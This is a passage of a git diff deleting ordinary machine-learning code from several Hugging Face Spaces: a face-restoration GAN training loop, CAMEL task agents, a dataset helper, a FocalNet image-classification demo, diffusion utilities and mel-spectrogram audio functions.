regions - if self.use_facial_disc: - self.get_roi_regions(eye_out_size=80, mouth_out_size=120) - - l_g_total = 0 - loss_dict = OrderedDict() - if (current_iter % self.net_d_iters == 0 and current_iter > self.net_d_init_iters): - # pixel loss - if self.cri_pix: - l_g_pix = self.cri_pix(self.output, self.gt) - l_g_total += l_g_pix - loss_dict['l_g_pix'] = l_g_pix - - # image pyramid loss - if pyramid_loss_weight > 0: - for i in range(0, self.log_size - 2): - l_pyramid = self.cri_l1(out_rgbs[i], pyramid_gt[i]) * pyramid_loss_weight - l_g_total += l_pyramid - loss_dict[f'l_p_{2**(i+3)}'] = l_pyramid - - # perceptual loss - if self.cri_perceptual: - l_g_percep, l_g_style = self.cri_perceptual(self.output, self.gt) - if l_g_percep is not None: - l_g_total += l_g_percep - loss_dict['l_g_percep'] = l_g_percep - if l_g_style is not None: - l_g_total += l_g_style - loss_dict['l_g_style'] = l_g_style - - # gan loss - fake_g_pred = self.net_d(self.output) - l_g_gan = self.cri_gan(fake_g_pred, True, is_disc=False) - l_g_total += l_g_gan - loss_dict['l_g_gan'] = l_g_gan - - # facial component loss - if self.use_facial_disc: - # left eye - fake_left_eye, fake_left_eye_feats = self.net_d_left_eye(self.left_eyes, return_feats=True) - l_g_gan = self.cri_component(fake_left_eye, True, is_disc=False) - l_g_total += l_g_gan - loss_dict['l_g_gan_left_eye'] = l_g_gan - # right eye - fake_right_eye, fake_right_eye_feats = self.net_d_right_eye(self.right_eyes, return_feats=True) - l_g_gan = self.cri_component(fake_right_eye, True, is_disc=False) - l_g_total += l_g_gan - loss_dict['l_g_gan_right_eye'] = l_g_gan - # mouth - fake_mouth, fake_mouth_feats = self.net_d_mouth(self.mouths, return_feats=True) - l_g_gan = self.cri_component(fake_mouth, True, is_disc=False) - l_g_total += l_g_gan - loss_dict['l_g_gan_mouth'] = l_g_gan - - if self.opt['train'].get('comp_style_weight', 0) > 0: - # get gt feat - _, real_left_eye_feats = self.net_d_left_eye(self.left_eyes_gt, return_feats=True) - _, real_right_eye_feats = self.net_d_right_eye(self.right_eyes_gt, return_feats=True) - _, real_mouth_feats = self.net_d_mouth(self.mouths_gt, return_feats=True) - - def _comp_style(feat, feat_gt, criterion): - return criterion(self._gram_mat(feat[0]), self._gram_mat( - feat_gt[0].detach())) * 0.5 + criterion( - self._gram_mat(feat[1]), self._gram_mat(feat_gt[1].detach())) - - # facial component style loss - comp_style_loss = 0 - comp_style_loss += _comp_style(fake_left_eye_feats, real_left_eye_feats, self.cri_l1) - comp_style_loss += _comp_style(fake_right_eye_feats, real_right_eye_feats, self.cri_l1) - comp_style_loss += _comp_style(fake_mouth_feats, real_mouth_feats, self.cri_l1) - comp_style_loss = comp_style_loss * self.opt['train']['comp_style_weight'] - l_g_total += comp_style_loss - loss_dict['l_g_comp_style_loss'] = comp_style_loss - - # identity loss - if self.use_identity: - identity_weight = self.opt['train']['identity_weight'] - # get gray images and resize - out_gray = self.gray_resize_for_identity(self.output) - gt_gray = self.gray_resize_for_identity(self.gt) - - identity_gt = self.network_identity(gt_gray).detach() - identity_out = self.network_identity(out_gray) - l_identity = self.cri_l1(identity_out, identity_gt) * identity_weight - l_g_total += l_identity - loss_dict['l_identity'] = l_identity - - l_g_total.backward() - self.optimizer_g.step() - - # EMA - self.model_ema(decay=0.5**(32 / (10 * 1000))) - - # ----------- optimize net_d ----------- # - for p in self.net_d.parameters(): - p.requires_grad = True - self.optimizer_d.zero_grad() - if self.use_facial_disc: - for p in self.net_d_left_eye.parameters(): - p.requires_grad = True - for p in self.net_d_right_eye.parameters(): - p.requires_grad = True - for p in self.net_d_mouth.parameters(): - p.requires_grad = True - self.optimizer_d_left_eye.zero_grad() - self.optimizer_d_right_eye.zero_grad() - self.optimizer_d_mouth.zero_grad() - - fake_d_pred = self.net_d(self.output.detach()) - real_d_pred = self.net_d(self.gt) - l_d = self.cri_gan(real_d_pred, True, is_disc=True) + self.cri_gan(fake_d_pred, False, is_disc=True) - loss_dict['l_d'] = l_d - # In WGAN, real_score should be positive and fake_score should be negative - loss_dict['real_score'] = real_d_pred.detach().mean() - loss_dict['fake_score'] = fake_d_pred.detach().mean() - l_d.backward() - - # regularization loss - if current_iter % self.net_d_reg_every == 0: - self.gt.requires_grad = True - real_pred = self.net_d(self.gt) - l_d_r1 = r1_penalty(real_pred, self.gt) - l_d_r1 = (self.r1_reg_weight / 2 * l_d_r1 * self.net_d_reg_every + 0 * real_pred[0]) - loss_dict['l_d_r1'] = l_d_r1.detach().mean() - l_d_r1.backward() - - self.optimizer_d.step() - - # optimize facial component discriminators - if self.use_facial_disc: - # left eye - fake_d_pred, _ = self.net_d_left_eye(self.left_eyes.detach()) - real_d_pred, _ = self.net_d_left_eye(self.left_eyes_gt) - l_d_left_eye = self.cri_component( - real_d_pred, True, is_disc=True) + self.cri_gan( - fake_d_pred, False, is_disc=True) - loss_dict['l_d_left_eye'] = l_d_left_eye - l_d_left_eye.backward() - # right eye - fake_d_pred, _ = self.net_d_right_eye(self.right_eyes.detach()) - real_d_pred, _ = self.net_d_right_eye(self.right_eyes_gt) - l_d_right_eye = self.cri_component( - real_d_pred, True, is_disc=True) + self.cri_gan( - fake_d_pred, False, is_disc=True) - loss_dict['l_d_right_eye'] = l_d_right_eye - l_d_right_eye.backward() - # mouth - fake_d_pred, _ = self.net_d_mouth(self.mouths.detach()) - real_d_pred, _ = self.net_d_mouth(self.mouths_gt) - l_d_mouth = self.cri_component( - real_d_pred, True, is_disc=True) + self.cri_gan( - fake_d_pred, False, is_disc=True) - loss_dict['l_d_mouth'] = l_d_mouth - l_d_mouth.backward() - - self.optimizer_d_left_eye.step() - self.optimizer_d_right_eye.step() - self.optimizer_d_mouth.step() - - self.log_dict = self.reduce_loss_dict(loss_dict) - - def test(self): - with torch.no_grad(): - if hasattr(self, 'net_g_ema'): - self.net_g_ema.eval() - self.output, _ = self.net_g_ema(self.lq) - else: - logger = get_root_logger() - logger.warning('Do not have self.net_g_ema, use self.net_g.') - self.net_g.eval() - self.output, _ = self.net_g(self.lq) - self.net_g.train() - - def dist_validation(self, dataloader, current_iter, tb_logger, save_img): - if self.opt['rank'] == 0: - self.nondist_validation(dataloader, current_iter, tb_logger, save_img) - - def nondist_validation(self, dataloader, current_iter, tb_logger, save_img): - dataset_name = dataloader.dataset.opt['name'] - with_metrics = self.opt['val'].get('metrics') is not None - use_pbar = self.opt['val'].get('pbar', False) - - if with_metrics: - if not hasattr(self, 'metric_results'): # only execute in the first run - self.metric_results = {metric: 0 for metric in self.opt['val']['metrics'].keys()} - # initialize the best metric results for each dataset_name (supporting multiple validation datasets) - self._initialize_best_metric_results(dataset_name) - # zero self.metric_results - self.metric_results = {metric: 0 for metric in self.metric_results} - - metric_data = dict() - if use_pbar: - pbar = tqdm(total=len(dataloader), unit='image') - - for idx, val_data in enumerate(dataloader): - img_name = osp.splitext(osp.basename(val_data['lq_path'][0]))[0] - self.feed_data(val_data) - self.test() - - sr_img = tensor2img(self.output.detach().cpu(), min_max=(-1, 1)) - metric_data['img'] = sr_img - if hasattr(self, 'gt'): - gt_img = tensor2img(self.gt.detach().cpu(), min_max=(-1, 1)) - metric_data['img2'] = gt_img - del self.gt - - # tentative for out of GPU memory - del self.lq - del self.output - torch.cuda.empty_cache() - - if save_img: - if self.opt['is_train']: - save_img_path = osp.join(self.opt['path']['visualization'], img_name, - f'{img_name}_{current_iter}.png') - else: - if self.opt['val']['suffix']: - save_img_path = osp.join(self.opt['path']['visualization'], dataset_name, - f'{img_name}_{self.opt["val"]["suffix"]}.png') - else: - save_img_path = osp.join(self.opt['path']['visualization'], dataset_name, - f'{img_name}_{self.opt["name"]}.png') - imwrite(sr_img, save_img_path) - - if with_metrics: - # calculate metrics - for name, opt_ in self.opt['val']['metrics'].items(): - self.metric_results[name] += calculate_metric(metric_data, opt_) - if use_pbar: - pbar.update(1) - pbar.set_description(f'Test {img_name}') - if use_pbar: - pbar.close() - - if with_metrics: - for metric in self.metric_results.keys(): - self.metric_results[metric] /= (idx + 1) - # update the best metric result - self._update_best_metric_result(dataset_name, metric, self.metric_results[metric], current_iter) - - self._log_validation_metric_values(current_iter, dataset_name, tb_logger) - - def _log_validation_metric_values(self, current_iter, dataset_name, tb_logger): - log_str = f'Validation {dataset_name}\n' - for metric, value in self.metric_results.items(): - log_str += f'\t # {metric}: {value:.4f}' - if hasattr(self, 'best_metric_results'): - log_str += (f'\tBest: {self.best_metric_results[dataset_name][metric]["val"]:.4f} @ ' - f'{self.best_metric_results[dataset_name][metric]["iter"]} iter') - log_str += '\n' - - logger = get_root_logger() - logger.info(log_str) - if tb_logger: - for metric, value in self.metric_results.items(): - tb_logger.add_scalar(f'metrics/{dataset_name}/{metric}', value, current_iter) - - def save(self, epoch, current_iter): - # save net_g and net_d - self.save_network([self.net_g, self.net_g_ema], 'net_g', current_iter, param_key=['params', 'params_ema']) - self.save_network(self.net_d, 'net_d', current_iter) - # save component discriminators - if self.use_facial_disc: - self.save_network(self.net_d_left_eye, 'net_d_left_eye', current_iter) - self.save_network(self.net_d_right_eye, 'net_d_right_eye', current_iter) - self.save_network(self.net_d_mouth, 'net_d_mouth', current_iter) - # save training state - self.save_training_state(epoch, current_iter) diff --git a/spaces/jskalbg/ChatDev01/camel/agents/task_agent.py b/spaces/jskalbg/ChatDev01/camel/agents/task_agent.py deleted file mode 100644 index 20320cfa9a10610d8f5b77af5c523440925ed3b9..0000000000000000000000000000000000000000 --- a/spaces/jskalbg/ChatDev01/camel/agents/task_agent.py +++ /dev/null @@ -1,171 +0,0 @@ -# =========== Copyright 2023 @ CAMEL-AI.org. All Rights Reserved. =========== -# Licensed under the Apache License, Version 2.0 (the “License”); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an “AS IS” BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# =========== Copyright 2023 @ CAMEL-AI.org. All Rights Reserved. =========== -from typing import Any, Dict, Optional, Union - -from camel.agents import ChatAgent -from camel.configs import ChatGPTConfig -from camel.messages import SystemMessage, UserChatMessage -from camel.prompts import PromptTemplateGenerator, TextPrompt -from camel.typing import ModelType, RoleType, TaskType - - -class TaskSpecifyAgent(ChatAgent): - r"""An agent that Specifies a given task prompt by prompting the user to - provide more details. - - Attributes: - DEFAULT_WORD_LIMIT (int): The default word limit for the task prompt. - task_specify_prompt (TextPrompt): The prompt for specifying the task. - - Args: - model (ModelType): The type of model to use for the agent. - (default: :obj:`ModelType.GPT_3_5_TURBO`) - task_type (TaskType): The type of task for which to generate a prompt. - (default: :obj:`TaskType.AI_SOCIETY`) - model_config (Any): The configuration for the model. - (default: :obj:`None`) - task_specify_prompt (Optional[TextPrompt]): The prompt for specifying - the task. (default: :obj:`None`) - word_limit (int): The word limit for the task prompt. - (default: :obj:`50`) - """ - DEFAULT_WORD_LIMIT = 50 - - def __init__( - self, - model: Optional[ModelType] = None, - task_type: TaskType = TaskType.AI_SOCIETY, - model_config: Optional[Any] = None, - task_specify_prompt: Optional[Union[str, TextPrompt]] = None, - word_limit: int = DEFAULT_WORD_LIMIT, - ) -> None: - - if task_specify_prompt is None: - task_specify_prompt_template = PromptTemplateGenerator( - ).get_task_specify_prompt(task_type) - - self.task_specify_prompt = task_specify_prompt_template.format( - word_limit=word_limit) - else: - self.task_specify_prompt = task_specify_prompt - - model_config = model_config or ChatGPTConfig(temperature=1.0) - - system_message = SystemMessage( - role_name="Task Specifier", - role_type=RoleType.ASSISTANT, - content="You can make a task more specific.", - ) - super().__init__(system_message, model, model_config) - - def step( - self, - original_task_prompt: Union[str, TextPrompt], - meta_dict: Optional[Dict[str, Any]] = None, - ) -> TextPrompt: - r"""Specify the given task prompt by providing more details. - - Args: - original_task_prompt (Union[str, TextPrompt]): The original task - prompt. - meta_dict (Optional[Dict[str, Any]]): A dictionary containing - additional information to include in the prompt. - (default: :obj:`None`) - - Returns: - TextPrompt: The specified task prompt. - """ - self.reset() - self.task_specify_prompt = self.task_specify_prompt.format( - task=original_task_prompt) - - if meta_dict is not None: - self.task_specify_prompt = (self.task_specify_prompt.format( - **meta_dict)) - - task_msg = UserChatMessage(role_name="Task Specifier", - content=self.task_specify_prompt) - specifier_response = super().step(task_msg) - if (specifier_response.msgs is None - or len(specifier_response.msgs) == 0): - raise RuntimeError("Task specification failed.") - specified_task_msg = specifier_response.msgs[0] - - if specifier_response.terminated: - raise RuntimeError("Task specification failed.") - - return TextPrompt(specified_task_msg.content) - - -class TaskPlannerAgent(ChatAgent): - r"""An agent that helps divide a task into subtasks based on the input - task prompt. - - Attributes: - task_planner_prompt (TextPrompt): A prompt for the agent to divide - the task into subtasks. - - Args: - model (ModelType): The type of model to use for the agent. - (default: :obj:`ModelType.GPT_3_5_TURBO`) - model_config (Any): The configuration for the model. - (default: :obj:`None`) - """ - - def __init__( - self, - model: Optional[ModelType] = None, - model_config: Any = None, - ) -> None: - - self.task_planner_prompt = TextPrompt( - "Divide this task into subtasks: {task}. Be concise.") - - system_message = SystemMessage( - role_name="Task Planner", - role_type=RoleType.ASSISTANT, - content="You are a helpful task planner.", - ) - super().__init__(system_message, model, model_config) - - def step( - self, - task_prompt: Union[str, TextPrompt], - ) -> TextPrompt: - r"""Generate subtasks based on the input task prompt. - - Args: - task_prompt (Union[str, TextPrompt]): The prompt for the task to - be divided into subtasks. - - Returns: - TextPrompt: A prompt for the subtasks generated by the agent. - """ - # TODO: Maybe include roles information. - self.reset() - self.task_planner_prompt = self.task_planner_prompt.format( - task=task_prompt) - - task_msg = UserChatMessage(role_name="Task Planner", - content=self.task_planner_prompt) - # sub_tasks_msgs, terminated, _ - task_tesponse = super().step(task_msg) - - if task_tesponse.msgs is None: - raise RuntimeError("Got None Subtasks messages.") - if task_tesponse.terminated: - raise RuntimeError("Task planning failed.") - - sub_tasks_msg = task_tesponse.msgs[0] - return TextPrompt(sub_tasks_msg.content) diff --git a/spaces/juancopi81/whisper-youtube-2-hf_dataset/dataset/hf_dataset.py b/spaces/juancopi81/whisper-youtube-2-hf_dataset/dataset/hf_dataset.py deleted file mode 100644 index 11270df2a215c3144ed58b836fa06c7edb53604a..0000000000000000000000000000000000000000 --- a/spaces/juancopi81/whisper-youtube-2-hf_dataset/dataset/hf_dataset.py +++ /dev/null @@ -1,48 +0,0 @@ -# Adapted from Eduardo Matallanas -from datasets import load_dataset, Dataset -from datasets.data_files import EmptyDatasetError - -class HFDataset(): - """ - Create a dataset to save the transcripts from Youtube. - """ - def __init__(self, name) -> None: - self.name = name - if name != "": - self._init_dataset() - else: - self.dataset = Dataset.from_dict({}) - self.exist = False - self.is_empty = True - - def _init_dataset(self): - try: - self.dataset = load_dataset(self.name) - self.exist = True - self.is_empty = False - self.list_of_ids = self._get_list_of_id() - except EmptyDatasetError: - self.dataset = Dataset.from_dict({}) - self.exist = True - self.is_empty = True - self.list_of_ids = [] - pass - except FileNotFoundError: - self.dataset = Dataset.from_dict({}) - self.exist = False - self.is_empty = True - self.list_of_ids = [] - pass - - def upload(self): - self.dataset.push_to_hub(self.name) - - def _get_list_of_id(self): - new_ds = self.dataset.map( - lambda x: {"ID": [url.split("=")[-1] for url in x["URL"]]}, batched=True - ) - list_of_ids = [] - for split in new_ds: - ids = new_ds[split]["ID"] - list_of_ids.append(ids) - return [item for sublist in list_of_ids for item in sublist] \ No newline at end of file diff --git a/spaces/jw2yang/focalnet-modulators/app.py b/spaces/jw2yang/focalnet-modulators/app.py deleted file mode 100644 index a7afb40af6c11d86f3b59c1567cdfc240aa32a82..0000000000000000000000000000000000000000 --- a/spaces/jw2yang/focalnet-modulators/app.py +++ /dev/null @@ -1,128 +0,0 @@ -import requests -import gradio as gr -import numpy as np -import cv2 -import torch -import torch.nn as nn -from PIL import Image -from torchvision import transforms -from timm.data.constants import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD -from timm.data import create_transform -from focalnet import FocalNet, build_transforms, build_transforms4display - -# Download human-readable labels for ImageNet. -response = requests.get("https://git.io/JJkYN") -labels = response.text.split("\n") - -''' -build model -''' -model = FocalNet(depths=[12], patch_size=16, embed_dim=768, focal_levels=[3], use_layerscale=True, use_postln=True) -# url = 'https://projects4jw.blob.core.windows.net/focalnet/release/classification/focalnet_base_iso_16.pth' -# checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu", check_hash=True) -checkpoint = torch.load("./focalnet_base_iso_16.pth", map_location="cpu") -model.load_state_dict(checkpoint["model"]) -model.eval() - -''' -build data transform -''' -eval_transforms = build_transforms(224, center_crop=False) -display_transforms = build_transforms4display(224, center_crop=False) - -''' -build upsampler -''' -# upsampler = nn.Upsample(scale_factor=16, mode='bilinear') - -''' -borrow code from here: https://github.com/jacobgil/pytorch-grad-cam/blob/master/pytorch_grad_cam/utils/image.py -''' -def show_cam_on_image(img: np.ndarray, - mask: np.ndarray, - use_rgb: bool = False, - colormap: int = cv2.COLORMAP_JET) -> np.ndarray: - """ This function overlays the cam mask on the image as an heatmap. - By default the heatmap is in BGR format. - :param img: The base image in RGB or BGR format. - :param mask: The cam mask. - :param use_rgb: Whether to use an RGB or BGR heatmap, this should be set to True if 'img' is in RGB format. - :param colormap: The OpenCV colormap to be used. - :returns: The default image with the cam overlay. - """ - heatmap = cv2.applyColorMap(np.uint8(255 * mask), colormap) - if use_rgb: - heatmap = cv2.cvtColor(heatmap, cv2.COLOR_BGR2RGB) - heatmap = np.float32(heatmap) / 255 - - if np.max(img) > 1: - raise Exception( - "The input image should np.float32 in the range [0, 1]") - - cam = 0.5*heatmap + 0.5*img - # cam = heatmap - # cam = cam / np.max(cam) - return np.uint8(255 * cam) - -def classify_image(inp): - - img_t = eval_transforms(inp) - img_d = display_transforms(inp).permute(1, 2, 0).numpy() - print(img_d.min(), img_d.max()) - - prediction = model(img_t.unsqueeze(0)).softmax(-1).flatten() - - modulator = model.layers[0].blocks[11].modulation.modulator.norm(2, 1, keepdim=True) - modulator = nn.Upsample(size=img_t.shape[1:], mode='bilinear')(modulator) - modulator = modulator.squeeze(1).detach().permute(1, 2, 0).numpy() - modulator = (modulator - modulator.min()) / (modulator.max() - modulator.min()) - cam0 = show_cam_on_image(img_d, modulator, use_rgb=True) - - modulator = model.layers[0].blocks[8].modulation.modulator.norm(2, 1, keepdim=True) - modulator = nn.Upsample(size=img_t.shape[1:], mode='bilinear')(modulator) - modulator = modulator.squeeze(1).detach().permute(1, 2, 0).numpy() - modulator = (modulator - modulator.min()) / (modulator.max() - modulator.min()) - cam1 = show_cam_on_image(img_d, modulator, use_rgb=True) - - modulator = model.layers[0].blocks[5].modulation.modulator.norm(2, 1, keepdim=True) - modulator = nn.Upsample(size=img_t.shape[1:], mode='bilinear')(modulator) - modulator = modulator.squeeze(1).detach().permute(1, 2, 0).numpy() - modulator = (modulator - modulator.min()) / (modulator.max() - modulator.min()) - cam2 = show_cam_on_image(img_d, modulator, use_rgb=True) - - modulator = model.layers[0].blocks[2].modulation.modulator.norm(2, 1, keepdim=True) - modulator = nn.Upsample(size=img_t.shape[1:], mode='bilinear')(modulator) - modulator = modulator.squeeze(1).detach().permute(1, 2, 0).numpy() - modulator = (modulator - modulator.min()) / (modulator.max() - modulator.min()) - cam3 = show_cam_on_image(img_d, modulator, use_rgb=True) - - return {labels[i]: float(prediction[i]) for i in range(1000)}, Image.fromarray(cam0), Image.fromarray(cam1), Image.fromarray(cam2), Image.fromarray(cam3), Image.fromarray(np.uint8(255 * img_d)) - - -image = gr.inputs.Image() -label = gr.outputs.Label(num_top_classes=3) - -gr.Interface( - description="Image classification and visualizations with FocalNet (https://github.com/microsoft/FocalNet)", - fn=classify_image, - inputs=image, - outputs=[ - label, - gr.outputs.Image( - type="pil", - label="Modulator at layer 12"), - gr.outputs.Image( - type="pil", - label="Modulator at layer 9"), - gr.outputs.Image( - type="pil", - label="Modulator at layer 6"), - gr.outputs.Image( - type="pil", - label="Modulator at layer 3"), - gr.outputs.Image( - type="pil", - label="Cropped Input"), - ], - examples=[["./donut.png"], ["./horses.png"], ["./pencil.png"], ["./ILSVRC2012_val_00031987.JPEG"]], -).launch() diff --git a/spaces/jyseo/3DFuse/ldm/util.py b/spaces/jyseo/3DFuse/ldm/util.py deleted file mode 100644 index 8c09ca1c72f7ceb3f9d7f9546aae5561baf62b13..0000000000000000000000000000000000000000 --- a/spaces/jyseo/3DFuse/ldm/util.py +++ /dev/null @@ -1,197 +0,0 @@ -import importlib - -import torch -from torch import optim -import numpy as np - -from inspect import isfunction -from PIL import Image, ImageDraw, ImageFont - - -def log_txt_as_img(wh, xc, size=10): - # wh a tuple of (width, height) - # xc a list of captions to plot - b = len(xc) - txts = list() - for bi in range(b): - txt = Image.new("RGB", wh, color="white") - draw = ImageDraw.Draw(txt) - font = ImageFont.truetype('data/DejaVuSans.ttf', size=size) - nc = int(40 * (wh[0] / 256)) - lines = "\n".join(xc[bi][start:start + nc] for start in range(0, len(xc[bi]), nc)) - - try: - draw.text((0, 0), lines, fill="black", font=font) - except UnicodeEncodeError: - print("Cant encode string for logging. Skipping.") - - txt = np.array(txt).transpose(2, 0, 1) / 127.5 - 1.0 - txts.append(txt) - txts = np.stack(txts) - txts = torch.tensor(txts) - return txts - - -def ismap(x): - if not isinstance(x, torch.Tensor): - return False - return (len(x.shape) == 4) and (x.shape[1] > 3) - - -def isimage(x): - if not isinstance(x,torch.Tensor): - return False - return (len(x.shape) == 4) and (x.shape[1] == 3 or x.shape[1] == 1) - - -def exists(x): - return x is not None - - -def default(val, d): - if exists(val): - return val - return d() if isfunction(d) else d - - -def mean_flat(tensor): - """ - https://github.com/openai/guided-diffusion/blob/27c20a8fab9cb472df5d6bdd6c8d11c8f430b924/guided_diffusion/nn.py#L86 - Take the mean over all non-batch dimensions. - """ - return tensor.mean(dim=list(range(1, len(tensor.shape)))) - - -def count_params(model, verbose=False): - total_params = sum(p.numel() for p in model.parameters()) - if verbose: - print(f"{model.__class__.__name__} has {total_params*1.e-6:.2f} M params.") - return total_params - - -def instantiate_from_config(config): - if not "target" in config: - if config == '__is_first_stage__': - return None - elif config == "__is_unconditional__": - return None - raise KeyError("Expected key `target` to instantiate.") - return get_obj_from_str(config["target"])(**config.get("params", dict())) - - -def get_obj_from_str(string, reload=False): - module, cls = string.rsplit(".", 1) - if reload: - module_imp = importlib.import_module(module) - importlib.reload(module_imp) - return getattr(importlib.import_module(module, package=None), cls) - - -class AdamWwithEMAandWings(optim.Optimizer): - # credit to https://gist.github.com/crowsonkb/65f7265353f403714fce3b2595e0b298 - def __init__(self, params, lr=1.e-3, betas=(0.9, 0.999), eps=1.e-8, # TODO: check hyperparameters before using - weight_decay=1.e-2, amsgrad=False, ema_decay=0.9999, # ema decay to match previous code - ema_power=1., param_names=()): - """AdamW that saves EMA versions of the parameters.""" - if not 0.0 <= lr: - raise ValueError("Invalid learning rate: {}".format(lr)) - if not 0.0 <= eps: - raise ValueError("Invalid epsilon value: {}".format(eps)) - if not 0.0 <= betas[0] < 1.0: - raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0])) - if not 0.0 <= betas[1] < 1.0: - raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1])) - if not 0.0 <= weight_decay: - raise ValueError("Invalid weight_decay value: {}".format(weight_decay)) - if not 0.0 <= ema_decay <= 1.0: - raise ValueError("Invalid ema_decay value: {}".format(ema_decay)) - defaults = dict(lr=lr, betas=betas, eps=eps, - weight_decay=weight_decay, amsgrad=amsgrad, ema_decay=ema_decay, - ema_power=ema_power, param_names=param_names) - super().__init__(params, defaults) - - def __setstate__(self, state): - super().__setstate__(state) - for group in self.param_groups: - group.setdefault('amsgrad', False) - - @torch.no_grad() - def step(self, closure=None): - """Performs a single optimization step. - Args: - closure (callable, optional): A closure that reevaluates the model - and returns the loss. - """ - loss = None - if closure is not None: - with torch.enable_grad(): - loss = closure() - - for group in self.param_groups: - params_with_grad = [] - grads = [] - exp_avgs = [] - exp_avg_sqs = [] - ema_params_with_grad = [] - state_sums = [] - max_exp_avg_sqs = [] - state_steps = [] - amsgrad = group['amsgrad'] - beta1, beta2 = group['betas'] - ema_decay = group['ema_decay'] - ema_power = group['ema_power'] - - for p in group['params']: - if p.grad is None: - continue - params_with_grad.append(p) - if p.grad.is_sparse: - raise RuntimeError('AdamW does not support sparse gradients') - grads.append(p.grad) - - state = self.state[p] - - # State initialization - if len(state) == 0: - state['step'] = 0 - # Exponential moving average of gradient values - state['exp_avg'] = torch.zeros_like(p, memory_format=torch.preserve_format) - # Exponential moving average of squared gradient values - state['exp_avg_sq'] = torch.zeros_like(p, memory_format=torch.preserve_format) - if amsgrad: - # Maintains max of all exp. moving avg. of sq. grad. values - state['max_exp_avg_sq'] = torch.zeros_like(p, memory_format=torch.preserve_format) - # Exponential moving average of parameter values - state['param_exp_avg'] = p.detach().float().clone() - - exp_avgs.append(state['exp_avg']) - exp_avg_sqs.append(state['exp_avg_sq']) - ema_params_with_grad.append(state['param_exp_avg']) - - if amsgrad: - max_exp_avg_sqs.append(state['max_exp_avg_sq']) - - # update the steps for each param group update - state['step'] += 1 - # record the step after step update - state_steps.append(state['step']) - - optim._functional.adamw(params_with_grad, - grads, - exp_avgs, - exp_avg_sqs, - max_exp_avg_sqs, - state_steps, - amsgrad=amsgrad, - beta1=beta1, - beta2=beta2, - lr=group['lr'], - weight_decay=group['weight_decay'], - eps=group['eps'], - maximize=False) - - cur_ema_decay = min(ema_decay, 1 - state['step'] ** -ema_power) - for param, ema_param in zip(params_with_grad, ema_params_with_grad): - ema_param.mul_(cur_ema_decay).add_(param.float(), alpha=1 - cur_ema_decay) - - return loss \ No newline at end of file diff --git a/spaces/kaicheng/ChatGPT_ad/assets/external-scripts.js b/spaces/kaicheng/ChatGPT_ad/assets/external-scripts.js deleted file mode 100644 index 8d0352669045537af5698b1824dbc1dba21df478..0000000000000000000000000000000000000000 --- a/spaces/kaicheng/ChatGPT_ad/assets/external-scripts.js +++ /dev/null @@ -1,2 +0,0 @@ - -// external javascript here diff --git a/spaces/kevinwang676/Bert-VITS2/mel_processing.py b/spaces/kevinwang676/Bert-VITS2/mel_processing.py deleted file mode 100644 index 50435ecf88ef4fb6c1d47f3e6edd04c3ea7d3e80..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/Bert-VITS2/mel_processing.py +++ /dev/null @@ -1,112 +0,0 @@ -import math -import os -import random -import torch -from torch import nn -import torch.nn.functional as F -import torch.utils.data -import numpy as np -import librosa -import librosa.util as librosa_util -from librosa.util import normalize, pad_center, tiny -from scipy.signal import get_window -from scipy.io.wavfile import read -from librosa.filters import mel as librosa_mel_fn - -MAX_WAV_VALUE = 32768.0 - - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - """ - PARAMS - ------ - C: compression factor - """ - return torch.log(torch.clamp(x, min=clip_val) * C) - - -def dynamic_range_decompression_torch(x, C=1): - """ - PARAMS - ------ - C: compression factor used to compress - """ - return torch.exp(x) / C - - -def spectral_normalize_torch(magnitudes): - output = dynamic_range_compression_torch(magnitudes) - return output - - -def spectral_de_normalize_torch(magnitudes): - output = dynamic_range_decompression_torch(magnitudes) - return output - - -mel_basis = {} -hann_window = {} - - -def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - return spec - - -def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax): - global mel_basis - dtype_device = str(spec.dtype) + '_' + str(spec.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=spec.dtype, device=spec.device) - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - return spec - - -def mel_spectrogram_torch(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global mel_basis, hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=y.dtype, device=y.device) - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, 